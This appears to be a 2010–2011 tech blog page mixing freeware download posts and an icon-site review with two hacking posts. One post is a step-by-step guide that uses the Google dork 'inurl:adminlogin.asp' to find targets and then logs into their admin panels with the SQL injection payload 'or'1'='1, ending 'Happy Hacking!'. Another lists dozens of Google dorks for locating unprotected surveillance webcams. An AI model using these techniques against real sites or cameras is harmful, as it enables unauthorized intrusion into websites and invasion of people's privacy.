Sunday, September 11, 2011

ResizeMe - A simple image resizer/converter

4 comments
A simple image resizer/converter that supports multiple formats.
(.NET Framework 2.0 or higher required)
 Download from here
Read More...

WonderLogin - Windows 7 login screen changer

21 comments
A simple tweaking software that can be used to change the Windows 7 login screen with a click of a button. No installation is required, just download it and use it!.


    Download from here
Read More...

Thursday, October 7, 2010

Your First Live Hacking Technique

7 comments
There are many hacking techniques used for hacking a website. Here i am giving you a taste of SQL Injection method. SQL, OS, and LDAP injections occur when untrusted data is sent to an interpreter as part of a command or query. We can trick the interpreter into executing unintended commands. So, follow the below steps carefully. Now most of the sites are designed with SQL Injection in mind, hence the below method only works for poorly designed websites.

WARNING:
Any actions and or activities related to the material contained within this Website is solely your responsibility. The author and this sitewill not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

1) Go to Google and search for vulnerable ASP sites using "inurl:adminlogin.asp"



2) Choose a result

3) You will get a login window similar like this, use below data to login

Username : admin (always its admin)
Password : 'or'1'='1



4) If you are lucky, you will be redirected to the Admin Panel





5) Finished, you hacked a website!

the theory behind this hack is explained below,

SQL injection is the result of weak coding. Analyzing the above example, the site uses a SQL statement similar below to access and compare username and password from the database.

SELECT username,pwd FROM members WHERE 'username'='given username' AND 'pwd'='given password
when we type 'or'1'='1 in the password field it becomes
SELECT username,pwd FROM members WHERE 'username'='admin' AND 'pwd'=''or'1'='1'
So 1 = 1 will be always true and it proceeds the login. As for your knowledge it will not work with websites made of PHP. I will explain other techniques like XSS attacks in coming days. Happy Hacking!
Read More...

Iconfinder.com - Search Engine for Icons

16 comments
            Iconfinder.com provides high quality icons for web designers and developers in an easy and efficient way. This is the best place to search, sort, filter, and find icons for any occasion. At the time of this writing the site currently has 318,060 icons in its database!




More than 100000 free icons in one place and you can download all the free icons in PNG or ICO format.



It have a nice filtering option that lets you choose to show only icons that can be used commercially, commercial that doesn’t require a back link or all icons. You can also change the background color of the icons to white, black, or grey. This will let you see what they look like on your site or application.




You can additionally filter the icons by size anywhere from 0 to 512px. This helps you find the proper size without having to re-size and possibly pixelate an icon. If you want to see more icons per page, it gives you the option to see 18, 24 or 48 icons per page.

If you are a firefox user there is an add-on available for iconfiner.com, Install it from here.
Read More...

Wednesday, October 6, 2010

Viewing Live Webcams Using Google!

2 comments

cam
Google can be used to view unprotected live web cams around the world. It's a pretty old trick but still works like charm. By using simple Google Search queries, any user that has Internet can logon, access and watch thousands of unprotected surveillance cameras and webcams around the world.Privacy? Once online, there is no privacy. Your computer would only be private WITHOUT internet connections. Once the connection is up, virtually anyone can see you and what you’re doing. So the trick to find and search for open unprotected Internet webcams that broadcast to the web, is by using the following query:



 inurl:/view.shtml
 or
 intitle:”Live View / – AXIS” | inurl:view/view.shtml

The above query will reveal IP network web cameras that able to transmit live footage or individual images across the Internet from Axis Communications.However, contrary to popular believe, most of these webcams found by this trick is naturally meant for public viewing, and normally linked from a public website. Those private webcams attached to PC or used at the living room or bedroom or bathroom are normally won’t be able to find unless the owners purposely let Google crawl the link.

here is more queries,

inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1? intext:”Open Menu”
intext:”MOBOTIX M10? intext:”Open Menu”
intext:”MOBOTIX D10? intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console – Web Monitor”

www.drakepeak.net have built a database of live cameras found on the Internet. The database can be accessed directly at: http://www.drakepeak.net/index.php?content=livecams
Read More...